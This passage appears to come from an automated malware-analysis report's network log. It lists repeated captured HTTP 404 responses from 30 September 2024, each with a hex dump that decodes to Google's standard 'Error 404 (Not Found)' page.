31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:57 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:59 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:00 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:01 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:03 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:04 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:05 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 